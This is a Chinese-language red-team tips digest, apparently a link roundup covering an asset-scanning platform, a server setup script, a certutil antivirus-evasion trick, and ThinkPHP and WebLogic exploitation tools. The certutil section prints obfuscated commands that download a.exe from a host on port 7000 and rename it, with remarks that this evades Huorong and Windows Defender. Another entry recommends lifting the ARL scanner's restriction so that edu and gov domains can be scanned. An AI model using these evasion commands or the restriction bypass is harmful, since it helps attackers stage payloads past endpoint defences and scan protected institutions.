Quan

WEB安全

Nemo 自动化收集平台

1、IP资产
2、域名资产
3、指纹信息
4、API接口 （需提供相应的Key)
5、Poc验证与目录扫描
6、分布式任务
7、团队在线协作
8、Docker支持

https://mp.weixin.qq.com/s/KVpFLXLEeyMo1-MLr9uMsg

WEB安全

记录快速搭建HVV前环境

f8x快速配置服务器环境，自动帮你安装诸如docker Java等环境，非常的Nice!
比如安装docker: ./f8x -docker即可
安装ARL灯塔,安装前先解除下域名限制，不然扫不了edu/gov。推荐这篇文章:解除限制
然后就能美美的开始扫描啦~

http://www.redteam.wang

内网渗透

探究certutil在杀软中的绕过实践

结论：
;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deleteEccCurve
;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deletePolicyServer
;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deleteEnrollmentServer
;,@certutil  -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer
最后借用move命令还原：
move -DeleteHelloContainer a.exe
细节可见文章
火绒复制一个就行 Windows defender 混淆下命令就行

https://xz.aliyun.com/t/12503

WEB安全

ThinkPHP利用工具

这个工具蛮不错的，Payload集成的很好，更新状态也不赖

https://github.com/bewhale/thinkphp_gui_tools

WEB安全

WeblogicTool

一个超全的Weblogic利用脚本，看着还挺无敌的

https://github.com/KimJun1010/WeblogicTool